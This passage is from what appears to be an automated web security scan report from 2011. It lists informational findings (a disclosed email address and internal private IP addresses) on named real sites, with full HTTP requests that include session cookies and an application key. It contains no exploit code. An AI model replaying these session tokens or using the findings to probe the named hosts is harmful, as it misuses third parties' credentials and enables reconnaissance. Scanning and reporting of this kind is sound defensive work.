Cookie: TCID=1303674394504:2le; s_pers=%20s_nr%3D1303674501185%7C1306266501185%3B%20s_vnum%3D1306266408564%2526vn%253D2%7C1306266408564%3B%20s_visit%3D1%7C1303680178921%3B%20s_depth%3D1%7C1303680178926%3B%20dfa_cookie%3Dtuitruecredit%7C1303680178936%3B%20s_ev22%3D%255B%255B'%25257C%25257C%25257C%25257CTriBureauCMUStartupfee%25257Ccredit%25257C20110324-174a3c150b7e7f3b565b%25257C%25257C%25257C%25257C'%252C'1303674496801'%255D%252C%255B'%25257C%25257C%25257C%25257C%25257Ccredit%25257C%25257C%25257C%25257C%25257C'%252C'1303674498602'%255D%252C%255B'%25257C%25257C%25257C%25257C%25257Ccredit%25257C%25257C%25257C%25257C%25257C'%252C'1303674501180'%255D%252C%255B'%25257C%25257C%25257C%25257C%25257Ccredit%25257C%25257C%25257C%25257C%25257C'%252C'1303678375845'%255D%252C%255B'%25257C%25257C%25257C%25257C%25257Ccredit%25257C%25257C%25257C%25257C%25257C'%252C'1303678378941'%255D%255D%7C1461531178941%3B%20s_invisit%3Dtrue%7C1303680178950%3B%20s_lv%3D1303678378956%7C1398286378956%3B%20s_lv_s%3DLess%2520than%25201%2520day%7C1303680178956%3B%20s_pv%3Dtc%253ALogin%2520%253A%2520Return%2520User%2520Login%7C1303680178964%3B; TLSESSIONID=1303691658482; TCVISIT=558554714-New-TrueCredit; JSESSIONID=d6eHw60bY1o7

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 00:34:22 GMT
Server: Apache
ETag: "AAAAS6kpCRA"
Last-Modified: Fri, 11 Mar 2011 11:19:04 GMT
Expires: Mon, 25 Apr 2011 09:13:16 GMT
Content-Length: 68334
Connection: close
Content-Type: application/x-javascript

//Method to hide the Second Level Tab Seperators "|" onMouseOver and display onMouseOut
function navMouseOver(element){
if (element.style.color!='#518274') {
element.style.color='#518274'

...[SNIP]...
<matt@mattkruse.com>
...[SNIP]...

26.119. https://www.truecredit.com/shared/cncr/js/common.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.truecredit.com
Path:   /shared/cncr/js/common.js

Issue detail

The following email address was disclosed in the response:

Request

GET /shared/cncr/js/common.js HTTP/1.1
Host: www.truecredit.com
Connection: keep-alive
Referer: https://www.truecredit.com/products/order2.jsp?package=TriBureauCMUStartupfee&cb=credit&formName=freeTriBureauCMUChoice&refid=20110324-174a3c150b7e7f3b565b
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TCID=1303674394504:2le; JSESSIONID=afd8RC5un2le

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 19:46:35 GMT
Server: Apache
ETag: "AAAAS6kpCRA"
Last-Modified: Fri, 11 Mar 2011 11:19:04 GMT
Expires: Mon, 25 Apr 2011 09:14:56 GMT
Content-Length: 68334
Connection: close
Content-Type: application/x-javascript

//Method to hide the Second Level Tab Seperators "|" onMouseOver and display onMouseOut
function navMouseOver(element){
if (element.style.color!='#518274') {
element.style.color='#518274'

...[SNIP]...
<matt@mattkruse.com>
...[SNIP]...

27. Private IP addresses disclosed  previous  next
There are 44 instances of this issue:


27.1. http://api.ak.facebook.com/restserver.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://api.ak.facebook.com
Path:   /restserver.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /restserver.php?v=1.0&method=links.getStats&format=json&urls=http%3A%2F%2Fsmartcompanygrowth.com%2Fbus-growth-svcs%2Fbus-devlpmnt-svcs%2Fbusiness-reputation-svcs%2F&callback=jsonp1303691673627 HTTP/1.1
Host: api.ak.facebook.com
Proxy-Connection: keep-alive
Referer: http://smartcompanygrowth.com/bus-growth-svcs/bus-devlpmnt-svcs/business-reputation-svcs/?gclid=CObW5ui1tqgCFUff4Aod4lhLCg
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Content-Type: text/javascript;charset=utf-8
Pragma:
X-FB-Rev: 369850
X-FB-Server: 10.28.12.129
X-Cnection: close
Content-Length: 371
Cache-Control: public, max-age=120
Expires: Mon, 25 Apr 2011 00:50:17 GMT
Date: Mon, 25 Apr 2011 00:48:17 GMT
Connection: close

jsonp1303691673627([{"url":"http:\/\/smartcompanygrowth.com\/bus-growth-svcs\/bus-devlpmnt-svcs\/business-reputation-svcs\/","normalized_url":"http:\/\/www.smartcompanygrowth.com\/bus-growth-svcs\/bus
...[SNIP]...

27.2. http://api.facebook.com/restserver.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://api.facebook.com
Path:   /restserver.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /restserver.php?format=json&method=links.getStats&urls=http%253A%252F%252Fwww.infusionblog.com%252F&callback=aptureJsonCallback0 HTTP/1.1
Host: api.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.infusionblog.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=120
Content-Type: text/javascript;charset=utf-8
Expires: Sun, 24 Apr 2011 18:42:09 -0700
Pragma:
X-FB-Rev: 370179
X-FB-Server: 10.36.44.120
X-Cnection: close
Date: Mon, 25 Apr 2011 01:40:09 GMT
Content-Length: 267

aptureJsonCallback0([{"url":"http\u00253A\u00252F\u00252Fwww.infusionblog.com\u00252F","normalized_url":"http:\/\/www.infusionblog.com\/","share_count":18,"like_count":5,"comment_count":4,"total_count
...[SNIP]...

27.3. http://connect.facebook.net/en_US/all.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://connect.facebook.net
Path:   /en_US/all.js

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /en_US/all.js HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: connect.facebook.net

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript; charset=utf-8
ETag: "30ed88529f4b080cd9fa7cd6380902a7"
X-FB-Server: 10.32.156.116
X-Cnection: close
Cache-Control: public, max-age=283
Expires: Sun, 24 Apr 2011 16:50:58 GMT
Date: Sun, 24 Apr 2011 16:46:15 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 115072

/*1303566538,169909364,JIT Construction: v369850,en_US*/

if(!window.FB)window.FB={_apiKey:null,_session:null,_userStatus:'unknown',_logging:true,_inCanvas:((window.location.search.indexOf('fb_sig_in_
...[SNIP]...

27.4. http://controlcase.com/ASV_register.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://controlcase.com
Path:   /ASV_register.php

Issue detail

The following RFC 1918 IP addresses were disclosed in the response:

Request

GET /ASV_register.php HTTP/1.1
Host: controlcase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _pk_ses.3.4216=*; __utmz=208121856.1303665078.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=4f4ff1e418036240366341de519ba50e; _pk_id.3.4216=1255198c4f383ed9.1303665077.1.1303665261.1303665077; __utma=208121856.1545234492.1303665078.1303665078.1303665078.1; __utmc=208121856; __utmb=208121856.4.10.1303665078;

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 17:25:41 GMT
Server: Apache/2.0.55 (Win32)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 26232

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<td>10.0.0.0</td>
...[SNIP]...
<td>10.255.255.255</td>
...[SNIP]...
<td>172.16.0.0</td>
...[SNIP]...
<td>172.31.255.255</td>
...[SNIP]...
<td>192.168.0.0</td>
...[SNIP]...
<td>192.168.255.255</td>
...[SNIP]...

27.5. http://static.ak.connect.facebook.com/connect.php/en_US/css/bookmark-button-css/connect-button-css/share-button-css/FB.Connect-css/connect-css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.connect.facebook.com
Path:   /connect.php/en_US/css/bookmark-button-css/connect-button-css/share-button-css/FB.Connect-css/connect-css

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /connect.php/en_US/css/bookmark-button-css/connect-button-css/share-button-css/FB.Connect-css/connect-css HTTP/1.1
Host: static.ak.connect.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.infusionblog.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Content-Type: text/css; charset=utf-8
ETag: "4cee9fd4a0927297616c6d703f3dd063"
X-FB-Server: 10.27.6.104
X-Cnection: close
Vary: Accept-Encoding
Cache-Control: public, max-age=1056
Expires: Mon, 25 Apr 2011 01:24:47 GMT
Date: Mon, 25 Apr 2011 01:07:11 GMT
Connection: close
Content-Length: 14288

/*1303255697,169543272,JIT Construction: v368160,en_US*/

.FB_UIButton{background-image:url(/images/ui/UIActionButton_ltr.png);border-style:solid;border-width:1px;display:-moz-inline-box;display:inlin
...[SNIP]...

27.6. http://static.ak.connect.facebook.com/connect.php/en_US/js/Api/CanvasUtil/Connect/XFBML  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.connect.facebook.com
Path:   /connect.php/en_US/js/Api/CanvasUtil/Connect/XFBML

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /connect.php/en_US/js/Api/CanvasUtil/Connect/XFBML HTTP/1.1
Host: static.ak.connect.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.infusionblog.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript; charset=utf-8
ETag: "e63f46c6c5f89385ad012fbf4a8f89f2"
X-FB-Server: 10.32.130.132
X-Cnection: close
Vary: Accept-Encoding
Cache-Control: public, max-age=395
Expires: Mon, 25 Apr 2011 01:13:46 GMT
Date: Mon, 25 Apr 2011 01:07:11 GMT
Connection: close
Content-Length: 211448

/*1303256097,169902724,JIT Construction: v368160,en_US*/

if (!window.FB) {FB = {};} if(!FB.dynData) { FB.dynData = {"site_vars":{"canvas_client_compute_content_size_method":1,"use_postMessage":0,"use
...[SNIP]...

27.7. http://static.ak.connect.facebook.com/images/loaders/indicator_white_large.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.connect.facebook.com
Path:   /images/loaders/indicator_white_large.gif

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /images/loaders/indicator_white_large.gif HTTP/1.1
Host: static.ak.connect.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.infusionblog.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Type: image/gif
X-FB-Server: 10.32.111.112
X-Cnection: close
Content-Length: 1894
Cache-Control: max-age=82679
Expires: Tue, 26 Apr 2011 00:05:10 GMT
Date: Mon, 25 Apr 2011 01:07:11 GMT
Connection: close

GIF89a . ....................................................................................................!..NETSCAPE2.0.....!.......,.... . .....%.di.h..l..p,..ATxE....../.#X.H...<*G...y..*T.u....
...[SNIP]...

27.8. http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php/en_US  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.connect.facebook.com
Path:   /js/api_lib/v0.4/FeatureLoader.js.php/en_US

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /js/api_lib/v0.4/FeatureLoader.js.php/en_US HTTP/1.1
Host: static.ak.connect.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.infusionblog.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript; charset=utf-8
ETag: "ab8a6e70ae1ee0128bf1811f5d95f63a"
X-FB-Server: 10.27.152.109
X-Cnection: close
Vary: Accept-Encoding
Cache-Control: public, max-age=756
Expires: Mon, 25 Apr 2011 01:19:43 GMT
Date: Mon, 25 Apr 2011 01:07:07 GMT
Connection: close
Content-Length: 18453

/*1303256341,169580653,JIT Construction: v368160,en_US*/

if (!window.FB) {FB = {};} if(!FB.dynData) { FB.dynData = {"site_vars":{"canvas_client_compute_content_size_method":1,"use_postMessage":0,"use
...[SNIP]...

27.9. http://static.ak.fbcdn.net/rsrc.php/v1/yF/r/Y7YCBKX-HZn.swf  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/yF/r/Y7YCBKX-HZn.swf

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /rsrc.php/v1/yF/r/Y7YCBKX-HZn.swf HTTP/1.1
Host: static.ak.fbcdn.net
Proxy-Connection: keep-alive
Referer: http://www.infusionblog.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Last-Modified: Wed, 02 Mar 2011 05:39:30 GMT
Content-Length: 3031
Content-Type: application/x-shockwave-flash
X-FB-Server: 10.30.148.192
X-Cnection: close
Cache-Control: public, max-age=197841
Expires: Wed, 27 Apr 2011 08:36:45 GMT
Date: Mon, 25 Apr 2011 01:39:24 GMT
Connection: close

CWS
....x.}X.w...W_O...N..E@.CB...f.d |$qH.0.....,.O..Y..r...Ci..]t........z.j{...N    g.?.....}.C..S.........k.l..3B:v...d6.G.......z..Z....5.mL...p..7.........c^}=;~...ln";1q.9.4....}.m........U.n.U..
...[SNIP]...

27.10. http://static.ak.fbcdn.net/rsrc.php/v1/z9/r/jKEcVPZFk-2.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /rsrc.php/v1/z9/r/jKEcVPZFk-2.gif

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /rsrc.php/v1/z9/r/jKEcVPZFk-2.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: static.ak.fbcdn.net

Response

HTTP/1.1 200 OK
Content-Type: image/gif
Last-Modified: Sun, 14 Mar 2010 12:52:55 -0700
X-Powered-By: HPHP
X-FB-Server: 10.138.17.185
Vary: Accept-Encoding
Cache-Control: public, max-age=28004747
Expires: Tue, 13 Mar 2012 19:53:28 GMT
Date: Sun, 24 Apr 2011 16:47:41 GMT
Connection: close
Content-Length: 1900

GIF89a . ....Ro.y.................e~.........................................................................!..NETSCAPE2.0.....!.......,.... . .... &.di.h..l..p,..AX.E....../.#\.H...<*G...y..,..u....
...[SNIP]...

27.11. https://vault.krypt.com/phpinfo.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://vault.krypt.com
Path:   /phpinfo.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /phpinfo.php HTTP/1.1
Host: vault.krypt.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=218737475.1303662879.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); UBERSID=5tmog719be1801lsop4imj2so6; __utma=218737475.1223332803.1303662879.1303662879.1303662879.1; __utmc=218737475; __utmb=218737475.7.10.1303662879; cid=9b766d29f4a59d55b1ee0c2aaaa06184

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 16:46:23 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 55558

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "DTD/xhtml1-transitional.dtd">
<html><head>
<style type="text/css">
body {background-color: #ffffff; color: #000000;}
body, td, th, h1, h
...[SNIP]...
<td class="v">172.16.40.22 </td>
...[SNIP]...
<td class="v">172.16.40.22</td>
...[SNIP]...

27.12. http://www.connect.facebook.com/widgets/fan.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.connect.facebook.com
Path:   /widgets/fan.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /widgets/fan.php?api_key=0235066d8a4432981843fd205ce15e37&channel_url=http%3A%2F%2Fwww.infusionblog.com%2F%3Ffbc_channel%3D1&id=54368662036&name=&width=200&connections=9&stream=0&logobar=0&css= HTTP/1.1
Host: www.connect.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.infusionblog.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.27.64.107
X-Cnection: close
Date: Mon, 25 Apr 2011 01:40:09 GMT
Content-Length: 11701

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

27.13. http://www.facebook.com/extern/login_status.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /extern/login_status.php?api_key=0235066d8a4432981843fd205ce15e37&extern=0&channel=http%3A%2F%2Fwww.infusionblog.com%2F%3Ffbc_channel%3D1&locale=en_US HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.infusionblog.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.137.38.127
X-Cnection: close
Date: Mon, 25 Apr 2011 01:39:44 GMT
Content-Length: 58

Given URL is not allowed by the Application configuration.

27.14. http://www.facebook.com/widgets/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /widgets/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /widgets/like.php?href=http://www.pedigreedatabase.com/german_shepherd_dog/forum.read?mnr=113206&layout=standard&show_faces=true&width=450&action=recommend&%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20font&colorscheme=light&height=80 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.facebook.com

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-XSS-Protection: 0
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.136.51.101
X-Cnection: close
Date: Sun, 24 Apr 2011 16:56:44 GMT
Elapsed: 0.049
Content-Length: 8583

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

27.15. https://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.facebook.com
Path:   /plugins/like.php

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /plugins/like.php HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
X-XSS-Protection: 0
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.37.40
Connection: close
Date: Sun, 24 Apr 2011 16:53:09 GMT
Content-Length: 7745

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...

27.16. http://www.fischerinternational.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fischerinternational.com
Path:   /favicon.ico

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /favicon.ico HTTP/1.1
Host: www.fischerinternational.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-empijefk=35A2FCA30952A45D9D039B704A6218A5

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.0
Content-Type: image/x-icon
ETag: "624f3a218641ca1:0"
Last-Modified: Wed, 30 Sep 2009 04:26:07 GMT
X-Powered-By: ASP.NET
Content-Length: 7782
Date: Sun, 24 Apr 2011 19:45:55 GMT
X-Varnish: 1806957048 1806909832
Age: 107
Connection: keep-alive
Via: 1.1 varnish 172.17.2.192
X-Cache: HIT

..............h...F...........h....... ...........    .. ..............(....... ...........@.............................................................................................................
...[SNIP]...

27.17. http://www.fischerinternational.com/flash/home.swf  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fischerinternational.com
Path:   /flash/home.swf

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /flash/home.swf HTTP/1.1
Host: www.fischerinternational.com
Proxy-Connection: keep-alive
Referer: http://www.fischerinternational.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-empijefk=35A2FCA30952A45D9D039B704A6218A5; campaign_code=none; campaign_code2=none

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/7.0
Content-Type: application/x-shockwave-flash
ETag: "a4352186374eca1:0"
Last-Modified: Fri, 16 Oct 2009 08:06:11 GMT
X-Powered-By: ASP.NET
Content-Length: 346835
Date: Sun, 24 Apr 2011 20:06:55 GMT
X-Varnish: 1807535013
Age: 0
Connection: keep-alive
Via: 1.1 varnish 172.17.2.192
X-Cache: MISS

CWS
'...x....<.]..>c...QC...{.^G.....%....%.D/...B..(."A..h..(AD'........w.......ff.{..Z{....u.&.@....w..7.@.4... .....P.v..7...........)q{...........K...{.............5.!.....`..[...1hz...C.C......
...[SNIP]...

27.18. http://www.fischerinternational.com/pics/banner_logo_fischer09.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
